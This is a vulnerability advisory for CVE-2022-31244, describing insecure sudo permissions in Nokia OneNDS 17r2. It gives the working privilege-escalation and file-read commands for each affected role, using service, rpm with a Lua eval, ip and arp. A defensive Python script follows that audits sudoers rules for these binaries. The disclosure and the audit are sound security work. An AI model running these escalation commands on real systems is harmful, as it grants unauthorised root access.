CVE-2022-31244: Nokia OneNDS 17 Insecure Permissions

Nokia OneNDS 17r2 has an Insecure Permissions vulnerability that allows for privilege escalation.

===============================================================================
             title: Incorrect Permission Assignment
           product: Nokia OneNDS 17
vulnerability type: Security Misconfiguration
          severity: High
        CVSS Score: 7.8
       CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
          found on: 31/03/2022
                by: Giacomo Sighinolfi, Milena Mangiola,
                    Savino Sisco, Valerio Casalino
               cve: CVE-2022-31244
===============================================================================

Some sudo permissions can be exploited by the users that have specific roles
to escalate to root privileges and execute arbitrary commands on the system.

The affected roles are:

ONENDS_CC_BASIC_ADMIN:
  - it can run /sbin/service
  - can be exploited using `sudo /sbin/service ../../bin/sh`

ONENDS_CC_SERVICE_ADMIN:
  - it can run /bin/rpm
  - can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`

ONENDS_CC_NETWORK_MANAGEMENT:
  - it can run /sbin/ip,/sbin/arp
  - can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'`
  - can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`
===============================================================================
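
A defender-side check for the pattern the advisory describes, added here as an example (it is not from the advisory or from Nokia): it parses sudoers text and reports rules that grant `/sbin/service`, `/bin/rpm`, `/sbin/ip` or `/sbin/arp` without pinning their arguments. The sample rules, the group names and the `NET_TOOLS` alias are constructed, and the parser is an assumption-level simplification that handles only plain `Cmnd_Alias` and user-specification lines.

```python
import re

# Binaries the advisory names, with the behaviour it describes for each.
RISKY = {
    "/sbin/service": "service name can traverse to any executable",
    "/bin/rpm": "--eval runs Lua macros",
    "/sbin/ip": "-batch reads a caller-chosen file",
    "/sbin/arp": "-f reads a caller-chosen file",
}

# Constructed sample; group and alias names are hypothetical.
SAMPLE = r"""
Cmnd_Alias NET_TOOLS = /sbin/ip, /sbin/arp
%basic_admin   ALL = (root) NOPASSWD: /sbin/service
%service_admin ALL = (root) /bin/rpm -qa, /bin/rpm
%net_mgmt      ALL = (root) NOPASSWD: NET_TOOLS
%operators     ALL = (root) /sbin/service ntpd status, /sbin/arp ""
"""

def audit_sudoers(text):
    """Return (principal, binary, reason) for rules that grant a risky
    binary with unrestricted or wildcard arguments."""
    aliases, rules, findings = {}, [], []
    for line in re.sub(r"\\\n", " ", text).splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
        elif "=" in line and not re.match(r"(Defaults|\w+_Alias)\b", line):
            who, spec = line.split("=", 1)
            rules.append((who.split()[0], spec))
    for who, spec in rules:
        spec = re.sub(r"\([^)]*\)", "", spec)  # drop the Runas list
        for item in spec.split(","):
            item = re.sub(r"^\s*(\w+:\s*)*", "", item).strip()  # drop tags
            for cmd in aliases.get(item, [item]):
                parts = cmd.split()
                # In sudoers, a bare path means "any arguments allowed".
                if parts and parts[0] in RISKY and (len(parts) == 1 or "*" in cmd):
                    findings.append((who, parts[0], RISKY[parts[0]]))
    return findings

if __name__ == "__main__":
    for who, binary, why in audit_sudoers(SAMPLE):
        print(f"{who}: {binary} ({why})")
```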
